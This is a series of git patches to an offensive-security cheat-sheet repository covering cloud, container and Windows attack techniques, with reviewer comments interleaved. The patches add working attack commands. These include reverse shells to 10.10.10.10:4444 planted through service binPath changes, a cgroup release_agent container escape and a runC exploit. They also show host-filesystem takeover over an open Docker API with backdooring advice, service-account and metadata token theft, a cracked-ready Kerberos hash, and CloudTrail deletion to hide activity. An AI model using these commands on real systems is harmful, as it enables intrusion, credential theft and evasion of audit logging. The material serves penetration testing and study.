From 1538ccd7f2932492006c4e97347cf80c19fd9f9a Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 19 Mar 2020 11:59:49 +0100 Subject: [PATCH 01/85] Gaining AWS Console Access via API Keys --- .../Cloud - AWS Pentest.md | 21 ++++++++++++++++++- .../Cloud - Azure Pentest.md | 5 ++++- 2 files changed, 24 insertions(+), 2 deletions(-) diff --git a/Methodology and Resources/Cloud - AWS Pentest.md b/Methodology and Resources/Cloud - AWS Pentest.md index bfe25c0..904f7d8 100644 --- a/Methodology and Resources/Cloud - AWS Pentest.md +++ b/Methodology and Resources/Cloud - AWS Pentest.md @@ -12,6 +12,7 @@ * [Method for Container Service (Fargate)](#method-for-container-service-fargate) * [AWS - Shadow Admin](#aws---shadow-admin) * [Admin equivalent permission](#admin-equivalent-permission) +* [AWS - Gaining AWS Console Access via API Keys](#aws---gaining-aws-console-access-via-api-keys) * [AWS - Mount EBS volume to EC2 Linux](#aws---mount-ebs-volume-to-ec2-linux) * [AWS - Copy EC2 using AMI Image](#aws---copy-ec2-using-ami-image) * [AWS - Instance Connect - Push an SSH key to EC2 instance](#aws---instance-connect---push-an-ssh-key-to-ec2-instance) 
@@ -331,6 +332,23 @@ Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/me $ aws glue create-dev-endpoint –endpoint-name my_dev_endpoint –role-arn arn_of_glue_service_role –public-key file://path/to/my/public/ssh/key.pub ``` +## AWS - Gaining AWS Console Access via API Keys + +A utility to convert your AWS CLI credentials into AWS console access. + +```powershell +$> git clone https://github.com/NetSPI/aws_consoler +$> aws_consoler -v -a AKIA[REDACTED] -s [REDACTED] +2020-03-13 19:44:57,800 [aws_consoler.cli] INFO: Validating arguments... +2020-03-13 19:44:57,801 [aws_consoler.cli] INFO: Calling logic. +2020-03-13 19:44:57,820 [aws_consoler.logic] INFO: Boto3 session established. +2020-03-13 19:44:58,193 [aws_consoler.logic] WARNING: Creds still permanent, creating federated session. +2020-03-13 19:44:58,698 [aws_consoler.logic] INFO: New federated session established. +2020-03-13 19:44:59,153 [aws_consoler.logic] INFO: Session valid, attempting to federate as arn:aws:sts::123456789012:federated-user/aws_consoler. +2020-03-13 19:44:59,668 [aws_consoler.logic] INFO: URL generated! +https://signin.aws.amazon.com/federation?Action=login&Issuer=consoler.local&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2Fconsole%2Fhome%3Fregion%3Dus-east-1&SigninToken=[REDACTED +``` + ## AWS - Mount EBS volume to EC2 Linux :warning: EBS snapshots are block-level incremental, which means that every snapshot only copies the blocks (or areas) in the volume that had been changed since the last snapshot. To restore your data, you need to create a new EBS volume from one of your EBS snapshots. The new volume will be a duplicate of the initial EBS volume on which the snapshot was taken. 
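Review bot: the new `## AWS - Gaining AWS Console Access via API Keys` block is fenced as `powershell` but is a Unix shell session (`$>` prompt, `git clone`), so it should be tagged `bash`, and the final output line is cut off at `SigninToken=[REDACTED` without the closing bracket. The text only says "convert your AWS CLI credentials into AWS console access"; it would help readers (and defenders) to state what the log itself shows: the tool turns permanent keys into a federated STS session (`federated-user/aws_consoler`) and builds a `signin.aws.amazon.com/federation` URL with `Issuer=consoler.local`, both of which are visible in CloudTrail and sign-in logs and make this activity straightforward to alert on.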
@@ -570,4 +588,5 @@ https://github.com/DenizParlak/Zeus * [HOW I HACKED A WHOLE EC2 NETWORK DURING A PENETRATION TEST - by Federico Fernandez](https://www.secsignal.org/en/news/how-i-hacked-a-whole-ec2-network-during-a-penetration-test/) * [How to Attach and Mount an EBS volume to EC2 Linux Instance - AUGUST 17, 2016](https://devopscube.com/mount-ebs-volume-ec2-instance/) * [Getting shell and data access in AWS by chaining vulnerabilities - Riyaz Walikar - Aug 29, 2019 ](https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed) -* [Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2) - Sunesh Govindaraj - Nov 25, 2019](https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650) \ No newline at end of file +* [Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2) - Sunesh Govindaraj - Nov 25, 2019](https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650) +* [Gaining AWS Console Access via API Keys - Ian Williams - March 18th, 2020](https://blog.netspi.com/gaining-aws-console-access-via-api-keys/) \ No newline at end of file diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md index 3cbe340..26548db 100644 --- a/Methodology and Resources/Cloud - Azure Pentest.md +++ b/Methodology and Resources/Cloud - Azure Pentest.md @@ -251,6 +251,7 @@ ForEach($role in $roles) { $roleUsers ### Enumeration using Microburst +git clone https://github.com/NetSPI/MicroBurst/blob/master/Get-AzureADDomainInfo.ps1 Import-Module .\MicroBurst.psm1 # Anonymous enumeration @@ -258,6 +259,7 @@ Invoke-EnumerateAzureBlobs -Base company Invoke-EnumerateAzureSubDomains -base company -verbose # Authencticated enumeration +Get-AzureADDomainInfo Get-AzureDomainInfo -folder MicroBurst -VerboseGet-MSOLDomainInfo Get-MSOLDomainInfo ``` 
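Review bot: in the `### Enumeration using Microburst` hunk, `git clone https://github.com/NetSPI/MicroBurst/blob/master/Get-AzureADDomainInfo.ps1` will fail, because `git clone` takes a repository URL, not a `/blob/` file URL; use `git clone https://github.com/NetSPI/MicroBurst`, which is also what the following `Import-Module .\MicroBurst.psm1` line expects. While this block is open, the context line `Get-AzureDomainInfo -folder MicroBurst -VerboseGet-MSOLDomainInfo` is two commands run together (`-Verbose` followed by `Get-MSOLDomainInfo`) and should be split, and `Authencticated` is a typo for `Authenticated`.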
@@ -426,4 +428,5 @@ NOTE: By default, O365 has a lockout policy of 10 tries, and it will lock out an * [Building Free Active Directory Lab in Azure - @kamran.bilgrami](https://medium.com/@kamran.bilgrami/ethical-hacking-lessons-building-free-active-directory-lab-in-azure-6c67a7eddd7f) * [Attacking Azure/Azure AD and introducing Powerzure - SpecterOps](https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a) * [Azure AD connect for RedTeam - @xpnsec](https://blog.xpnsec.com/azuread-connect-for-redteam/) -* [Azure Privilege Escalation Using Managed Identities - Karl Fosaaen - February 20th, 2020](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/) \ No newline at end of file +* [Azure Privilege Escalation Using Managed Identities - Karl Fosaaen - February 20th, 2020](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/) +* [Hunting Azure Admins for Vertical Escalation - LEE KAGAN - MARCH 13, 2020](https://www.lares.com/hunting-azure-admins-for-vertical-escalation/) \ No newline at end of file From 4303caa08c699b7b41501b1da7346e6a7ef7416c Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 19 Mar 2020 12:03:32 +0100 Subject: [PATCH 02/85] README - Summary update --- README.md | 21 ++++----------------- 1 file changed, 4 insertions(+), 17 deletions(-) diff --git a/README.md b/README.md index f6586c4..478a9a5 100644 --- a/README.md +++ b/README.md 
@@ -17,6 +17,9 @@ You might also like the `Methodology and Resources` folder : - [Methodology and Resources](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/) - [Active Directory Attack.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md) + - [Cloud - AWS Pentest.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md) + - [Cloud - Azure Pentest.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md) + - [Cobalt Strike - Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cobalt%20Strike%20-%20Cheatsheet.md) - [Linux - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Persistence.md) - [Linux - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md) - [Metasploit - Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Metasploit%20-%20Cheatsheet.md) 
@@ -31,23 +34,7 @@ You might also like the `Methodology and Resources` folder : - [Windows - Post Exploitation Koadic.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Post%20Exploitation%20Koadic.md) - [Windows - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md) - [Windows - Using credentials.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Using%20credentials.md) - - [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits) - - Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py - - Apache Struts 2 CVE-2017-9805.py - - Apache Struts 2 CVE-2018-11776.py - - Docker API RCE.py - - Drupalgeddon2 CVE-2018-7600.rb - - Heartbleed CVE-2014-0160.py - - JBoss CVE-2015-7501.py - - Jenkins CVE-2015-8103.py - - Jenkins CVE-2016-0792.py - - Rails CVE-2019-5420.rb - - Shellshock CVE-2014-6271.py - - Tomcat CVE-2017-12617.py - - WebLogic CVE-2016-3510.py - - WebLogic CVE-2017-10271.py - - WebLogic CVE-2018-2894.py - - WebSphere CVE-2015-7450.py + You want more ? Check the [Books](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/BOOKS.md) and [Youtube videos](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/YOUTUBE.md) selections. From 2bdbb2dbc5f225fa7329cb70204c6f1d85d7551d Mon Sep 17 00:00:00 2001 From: Fanis Katsimpas Date: Sun, 22 Mar 2020 19:25:35 +0000 Subject: [PATCH 03/85] Update Windows - Privilege Escalation.md Make powershell on EoP - Runas easier to copy paste --- .../Windows - Privilege Escalation.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 2b67480..4283e23 100644 
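Review bot: the `@@ -31,23 +34,7 @@` hunk removes the `CVE Exploits` entry together with the link to the folder itself and leaves an empty `+` line behind. If the intent is only to stop listing every script in the README, keep the single `- [CVE Exploits](...)` folder link so readers can still find that directory, and drop the stray blank line.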
--- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -12,7 +12,7 @@ * [Search for file contents](#search-for-file-contents) * [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename) * [Search the registry for key names and passwords](#search-the-registry-for-key-names-and-passwords) - * [Passwords in unattend.xml](#passwords-in-unattend.xml) + * [Passwords in unattend.xml](#passwords-in-unattendxml) * [Wifi passwords](#wifi-passwords) * [Passwords stored in services](#passwords-stored-in-services) * [Powershell history](#powershell-history) @@ -712,9 +712,9 @@ C:\Windows\System32\runas.exe /env /noprofile /user: "c:\us ``` ```powershell -$ secpasswd = ConvertTo-SecureString "" -AsPlainText -Force -$ mycreds = New-Object System.Management.Automation.PSCredential ("", $secpasswd) -$ computer = "" +$secpasswd = ConvertTo-SecureString "" -AsPlainText -Force +$mycreds = New-Object System.Management.Automation.PSCredential ("", $secpasswd) +$computer = "" [System.Diagnostics.Process]::Start("C:\users\public\nc.exe"," 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer) ``` 
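Review bot: in the `@@ -712,9 +712,9 @@` hunk the placeholders for the password, user name and computer come through as empty strings (`ConvertTo-SecureString "" -AsPlainText -Force`, `PSCredential ("", $secpasswd)`, `$computer = ""`), most likely angle-bracket placeholders that the Markdown renderer swallowed; with an empty user name `Process.Start` throws, so the block is still not copy-pasteable, which is what this commit sets out to fix. Use visible placeholders such as `USERNAME`, `PASSWORD` and `COMPUTER`, or escape the angle brackets. Removing the `$ ` prefix is the right change, since `$ secpasswd = ...` is not valid PowerShell. The anchor fix in the first hunk is also correct: GitHub drops the `.` when generating heading ids, so `#passwords-in-unattendxml` is the one that resolves.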
@@ -979,4 +979,4 @@ Detailed information about the vulnerability : https://www.zerodayinitiative.com * [Alternative methods of becoming SYSTEM - 20th November 2017 - Adam Chester @_xpn_](https://blog.xpnsec.com/becoming-system/) * [Living Off The Land Binaries and Scripts (and now also Libraries)](https://github.com/LOLBAS-Project/LOLBAS) * [Common Windows Misconfiguration: Services - 2018-09-23 - @am0nsec](https://amonsec.net/2018/09/23/Common-Windows-Misconfiguration-Services.html) -* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf) \ No newline at end of file +* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf) From 1b190939c48fa0b7543f77fb8168f100b5cdc412 Mon Sep 17 00:00:00 2001 From: PixeL Date: Mon, 23 Mar 2020 17:17:42 -0500 Subject: [PATCH 04/85] Remove example from win priv esc This example was used on hackthebox where it leaked the root flag of a machine on free servers. This resulted in every user being able to get the root flag before they have even completed the box which isn't fair to others. This example should either be changed or removed completely to combat copy-pasting without knowing what you're doing. --- Methodology and Resources/Windows - Privilege Escalation.md | 1 - 1 file changed, 1 deletion(-) diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 4283e23..6a2af2b 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md 
@@ -519,7 +519,6 @@ Prerequisite: Service account ```powershell PS C:\Windows\system32> sc.exe stop UsoSvc -PS C:\Windows\system32> sc.exe config UsoSvc binPath="cmd /c type C:\Users\Administrator\Desktop\root.txt > C:\a.txt" PS C:\Windows\system32> sc.exe config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe 10.10.10.10 4444 -e cmd.exe" PS C:\Windows\system32> sc.exe config UsoSvc binpath= "C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe" PS C:\Windows\system32> sc.exe qc usosvc From a3cc577ebda5414c7903cf69ba819ac52d317003 Mon Sep 17 00:00:00 2001 From: guenicoe <62290334+guenicoe@users.noreply.github.com> Date: Tue, 24 Mar 2020 20:15:59 +0000 Subject: [PATCH 05/85] added cmd on the USOSVC vuln Added `cmd \c C:\Users\nc.exe` as not typing `cmd \c` did not work for me. Might need even more explanation --- Methodology and Resources/Windows - Privilege Escalation.md | 1 + 1 file changed, 1 insertion(+) diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 6a2af2b..d4b05d6 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -521,6 +521,7 @@ Prerequisite: Service account PS C:\Windows\system32> sc.exe stop UsoSvc PS C:\Windows\system32> sc.exe config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe 10.10.10.10 4444 -e cmd.exe" PS C:\Windows\system32> sc.exe config UsoSvc binpath= "C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe" +PS C:\Windows\system32> sc.exe config UsoSvc binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe" PS C:\Windows\system32> sc.exe qc usosvc [SC] QueryServiceConfig SUCCESS From 95ab07b45eccbd57c00a889328187ba6356ec6f4 Mon Sep 17 00:00:00 2001 
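Review bot: the line added by PATCH 05 uses `cmd \c`, but the cmd.exe switch is `/c` (the line PATCH 04 removed shows the correct form), so `cmd \c C:\Users\nc.exe ...` is not doing what the text implies and should read `cmd /c`. The commit message itself says this may need more explanation, and the block would benefit from one sentence on the `sc.exe` syntax it relies on: `sc config` requires a space after `binpath=`, which the added line and the `UsoSvc binpath= "..."` context line have while the `usosvc binPath="..."` context line does not, so the three near-duplicate lines should be reduced to one correct form.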
From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sat, 28 Mar 2020 12:01:56 +0100 Subject: [PATCH 06/85] CloudTrail disable, GraphQL tool --- GraphQL Injection/README.md | 1 + .../Active Directory Attack.md | 7 +++++++ .../Cloud - AWS Pentest.md | 19 +++++++++++++++++++ 3 files changed, 27 insertions(+) diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md index 3a9883b..3719113 100644 --- a/GraphQL Injection/README.md +++ b/GraphQL Injection/README.md @@ -24,6 +24,7 @@ * [GraphQLmap - Scripting engine to interact with a graphql endpoint for pentesting purposes](https://github.com/swisskyrepo/GraphQLmap) * [GraphQL Security Toolkit - GraphQL Security Research Material](https://github.com/doyensec/graph-ql/) * [GraphQL IDE - An extensive IDE for exploring GraphQL API's](https://github.com/andev-software/graphql-ide) +* [InQL - A Burp Extension for GraphQL Security Testing](https://github.com/doyensec/inql) ## Exploit diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 395c02f..0da35ca 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md 
@@ -771,6 +771,13 @@ C:\Rubeus> john --wordlist=passwords_kerb.txt hashes.asreproast Using `impacket` to get the hash and `hashcat` to crack it. ```powershell +# example +$ python GetNPUsers.py htb.local/svc-alfresco -no-pass +Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation + +[*] Getting TGT for svc-alfresco +$krb5asrep$23$svc-alfresco@HTB.LOCAL:c13528009a59be0a634bb9b8e84c88ee$cb8e87d02bd0ac7ae561334cd58a56af90f7fbb20bbd4493b6754a57d5ebc08cb7f47ea472ebb7c9ba4260f57c11b664be03191550254e5c77a17518aeabc55f9321bd9f52201df820e130aa0e3f4b0986725fd3a14794433881050eb62d384c4058a407a348a7de2ef0767a99c9df4f85d8eba8ce30a4ad59621c51f8ea8c0d33f33e06bea1d8ff28d7a86fc2010fd7fa45d2fcc2178cb13c1006823aec8a5da10cffcceeb6e978754b0d4976df5cccb4beb9776d5a8f4810153ccc0e1237ec74e6ae61402457c6cfe29bca7c2f62b287f13aff063f5a0a21c728581e43b46d7537b3e776b4 + # extract hashes root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast diff --git a/Methodology and Resources/Cloud - AWS Pentest.md b/Methodology and Resources/Cloud - AWS Pentest.md index 904f7d8..2342c2b 100644 --- a/Methodology and Resources/Cloud - AWS Pentest.md +++ b/Methodology and Resources/Cloud - AWS Pentest.md 
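Review bot: the `# example` block added in the `@@ -771,6 +771,13 @@` hunk embeds a complete AS-REP hash for `svc-alfresco@HTB.LOCAL`, i.e. a real HackTheBox target, which is the same concern PATCH 04 raised about leaking lab content, and a multi-hundred-character opaque blob teaches the reader nothing the first few bytes do not. Truncate it to `$krb5asrep$23$svc-alfresco@HTB.LOCAL:c13528009a59be0a634bb9b8e84c88ee$[...]` and prefer a neutral domain, as the `jurassic.park` examples further down already do. The block is also fenced as `powershell` although the commands run from a Linux shell (`$`, `root@kali`).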
@@ -474,6 +474,25 @@ Prerequisite: 14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path +## Disable CloudTrail + +```powershell +$ aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator +``` + +Disable monitoring of events from global services + +```powershell +$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event +``` + +Disable Cloud Trail on specific regions + +```powershell +$ aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west +``` + + ## Cover tracks by obfuscating Cloudtrail logs and Guard Duty :warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent. From be8f32b5865ae365a2623ee33009883686457900 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 29 Mar 2020 16:48:09 +0200 Subject: [PATCH 07/85] Docker escape and exploit --- Kubernetes/readme.md | 13 +- .../Container - Docker Pentest.md | 132 ++++++++++++++++++ 2 files changed, 144 insertions(+), 1 deletion(-) create mode 100644 Methodology and Resources/Container - Docker Pentest.md diff --git a/Kubernetes/readme.md b/Kubernetes/readme.md index d409dc0..984d621 100644 --- a/Kubernetes/readme.md +++ b/Kubernetes/readme.md 
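Review bot: the `aws cloudtrail update-trail` options in the new `## Disable CloudTrail` section are misspelled and the CLI will reject them: the real flags are `--no-include-global-service-events` (plural) and `--no-is-multi-region-trail`, and `--region=eu-west` is not a region name (regions are of the form `eu-west-1`). The third heading says "on specific regions" while the command merely turns a multi-region trail into a single-region one. From the defensive side, one sentence is worth adding: each of these calls (`delete-trail`, `update-trail`) is itself recorded as a CloudTrail management event (`DeleteTrail`, `UpdateTrail`), so they are exactly the events a monitoring team should alert on.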
@@ -25,6 +25,16 @@ * [katacoda](https://katacoda.com/courses/kubernetes). Learn Kubernetes using interactive broser-based scenarios. +## Service Token + +> As it turns out, when pods (a Kubernetes abstraction for a group of containers) are created they are automatically assigned the default service account, and a new volume is created containing the token for accessing the Kubernetes API. That volume is then mounted into all the containers in the pod. + +```powershell +$ cat /var/run/secrets/kubernetes.io/serviceaccount + +# kubectl makes cluster compromise trivial as it will use that serviceaccount token without additional prompting +``` + ## RBAC Configuration ### Listing Secrets @@ -188,4 +198,5 @@ http://:10255/pods ## References - [Kubernetes Pentest Methodology Part 1 - by Or Ida on August 8, 2019](https://securityboulevard.com/2019/08/kubernetes-pentest-methodology-part-1) -- [Kubernetes Pentest Methodology Part 2 - by Or Ida on September 5, 2019](https://securityboulevard.com/2019/09/kubernetes-pentest-methodology-part-2) \ No newline at end of file +- [Kubernetes Pentest Methodology Part 2 - by Or Ida on September 5, 2019](https://securityboulevard.com/2019/09/kubernetes-pentest-methodology-part-2) +- [Capturing all the flags in BSidesSF CTF by pwning our infrastructure - Hackernoon](https://hackernoon.com/capturing-all-the-flags-in-bsidessf-ctf-by-pwning-our-infrastructure-3570b99b4dd0) \ No newline at end of file diff --git a/Methodology and Resources/Container - Docker Pentest.md b/Methodology and Resources/Container - Docker Pentest.md new file mode 100644 index 0000000..c4682cf --- /dev/null +++ b/Methodology and Resources/Container - Docker Pentest.md 
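Review bot: `cat /var/run/secrets/kubernetes.io/serviceaccount` in the new `## Service Token` block points at a directory, so `cat` only prints an error; the token is the file `/var/run/secrets/kubernetes.io/serviceaccount/token` (alongside `ca.crt` and `namespace`). The fence is tagged `powershell` for a Linux shell command. The quoted paragraph explains why the token is mounted by default; the section should also name the mitigation that follows from it, `automountServiceAccountToken: false` on pods (or service accounts) that do not need API access, which is what makes the `kubectl` remark in the comment moot.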
@@ -0,0 +1,132 @@ +# Docker Pentest + +> Docker is a set of platform as a service (PaaS) products that uses OS-level virtualization to deliver software in packages called containers. + +## Summary + +- [Tools](#tools) +- [Mounted Docker Socket](#mounted-docker-socket) +- [Open Docker API Port](#open-docker-api-port) +- [Insecure Docker Registry](#insecure-docker-registry) +- [Exploit privileged container abusing the Linux cgroup v1](#exploit-privileged-container-abusing-the-linux-cgroup-v1) +- [Breaking out of Docker via runC](#breaking-out-of-docker-via-runc) +- [References](#references) + +## Tools + +* Dockscan : https://github.com/kost/dockscan + ```powershell + dockscan unix:///var/run/docker.sock + dockscan -r html -o myreport -v tcp://example.com:5422 + ``` + +## Mounted Docker Socket + +Prerequisite: +* Socker mounted as volume : `- "/var/run/docker.sock:/var/run/docker.sock"` + +Usually found in `/var/run/docker.sock`, for example for Portainer. + +```powershell +curl --unix-socket /var/run/docker.sock http://127.0.0.1/containers/json +curl -XPOST –unix-socket /var/run/docker.sock -d '{"Image":"nginx"}' -H 'Content-Type: application/json' http://localhost/containers/create +curl -XPOST –unix-socket /var/run/docker.sock http://localhost/containers/ID_FROM_PREVIOUS_COMMAND/start +``` + + +## Open Docker API Port + +Prerequisite: +* Docker runned with `-H tcp://0.0.0.0:XXXX` + +```powershell +$ nmap -sCV 10.10.10.10 -p 2376 +2376/tcp open docker Docker 19.03.5 +| docker-version: +| Version: 19.03.5 +| MinAPIVersion: 1.12 +``` + +Mount the current system inside a new "temporary" Ubuntu container, you will gain root access to the filesystem in `/mnt`. 
+ +```powershell +$ export DOCKER_HOST=tcp://10.10.10.10:2376 +$ docker run --name ubuntu_bash --rm -i -v /:/mnt -u 0 -t ubuntu bash +or +$ docker -H open.docker.socket:2375 ps +$ docker -H open.docker.socket:2375 exec -it mysql /bin/bash +or +$ curl -s –insecure https://tls-opendocker.socket:2376/secrets | jq +$ curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket2376/containers/create?name=test -d '{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}' +``` + +From there you can backdoor the filesystem by adding an ssh key in `/root/.ssh` or adding a new root user in `/etc/passwd`. + + +## Insecure Docker Registry + +Docker Registry’s fingerprint is `Docker-Distribution-Api-Version` header. Then connect to Registry API endpoint: `/v2/_catalog`. + +```powershell +curl https://registry.example.com/v2//tags/list +docker pull https://registry.example.com:443/: +``` + +Access a private registry using OAuth Token from Google + +```powershell +curl http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/email +curl -s http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token +docker login -e -u oauth2accesstoken -p "" https://gcr.io +``` + + +## Exploit privileged container abusing the Linux cgroup v1 + +Prerequisite (at least one): + * `--privileged` + * `--security-opt apparmor=unconfined --cap-add=SYS_ADMIN` flags. 
+ +```powershell +docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash -c 'echo "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" | base64 -d | bash -' +``` + +Exploit breakdown : + +```powershell +# On the host +docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash + +# In the container +mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x + +echo 1 > /tmp/cgrp/x/notify_on_release +host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` +echo "$host_path/cmd" > /tmp/cgrp/release_agent + +echo '#!/bin/sh' > /cmd +echo "ps aux > $host_path/output" >> /cmd +chmod a+x /cmd + +sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" +``` + +## Breaking out of Docker via runC + +> The vulnerability allows a malicious container to (with minimal user interaction) overwrite the host runc binary and thus gain root-level code execution on the host. The level of user interaction is being able to run any command ... as root within a container in either of these contexts: Creating a new container using an attacker-controlled image. Attaching (docker exec) into an existing container which the attacker had previous write access to. 
- Vulnerability overview by the runC team + +Exploit for CVE-2019-5736 : https://github.com/twistlock/RunC-CVE-2019-5736 + +```powershell +$ docker build -t cve-2019-5736:malicious_image_POC ./RunC-CVE-2019-5736/malicious_image_POC +$ docker run --rm cve-2019-5736:malicious_image_POC +``` + +## References + +- [Hacking Docker Remotely - 17 March 2020 - ch0ks](https://hackarandas.com/blog/2020/03/17/hacking-docker-remotely/) +- [Understanding Docker container escapes - JULY 19, 2019 - Trail of Bits](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/) +- [Capturing all the flags in BSidesSF CTF by pwning our infrastructure - Hackernoon](https://hackernoon.com/capturing-all-the-flags-in-bsidessf-ctf-by-pwning-our-infrastructure-3570b99b4dd0) +- [Breaking out of Docker via runC – Explaining CVE-2019-5736 - Yuval Avrahami - February 21, 2019](https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/) +- [CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host - dragonsector.pl](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html) +- [OWASP - Docker Security CheatSheet](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Docker_Security_Cheat_Sheet.md) \ No newline at end of file From 1d299f55c9d8659a151d23db5e1356d9c7bca875 Mon Sep 17 00:00:00 2001 From: M4x Date: Sun, 29 Mar 2020 23:40:39 +0800 Subject: [PATCH 08/85] Delete unnecessary escape characters `whoami` has already been wrapped in backquotes. There is no need to user escape characters again --- Methodology and Resources/Linux - Privilege Escalation.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index e11bcee..26847cb 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md 
